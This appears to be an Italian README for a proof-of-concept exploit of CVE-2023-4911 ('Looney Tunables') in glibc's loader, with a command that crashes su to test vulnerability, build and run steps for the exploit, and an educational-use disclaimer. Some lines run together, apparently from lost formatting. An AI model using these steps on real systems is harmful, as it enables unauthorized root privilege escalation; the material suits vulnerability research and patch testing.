
Questa è una PoC di CVE-2023-4911 (noto anche come "Looney Tunables") che sfrutta un bug nella funzione parse_tunables() del dynamic loader di glibc, usata per il parsing della variabile d'ambiente GLIBC_TUNABLES.
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped) allora abbiamo a che fare con un target vulnerabile.libc.so.6python3 libc.py
gcc exp.c -o exp
Tutto il codice fornito in questo repository è esclusivamente a scopo educativo/di ricerca. Qualsiasi azione e/o attività relativa al materiale contenuto in questo repository è di esclusiva responsabilità dell'utente. L'uso improprio del codice in questo repository può comportare accuse penali a carico delle persone coinvolte. L'autore non sarà ritenuto responsabile nell'eventualità che vengano mosse accuse penali contro individui che utilizzano impropriamente il codice di questo repository per infrangere la legge.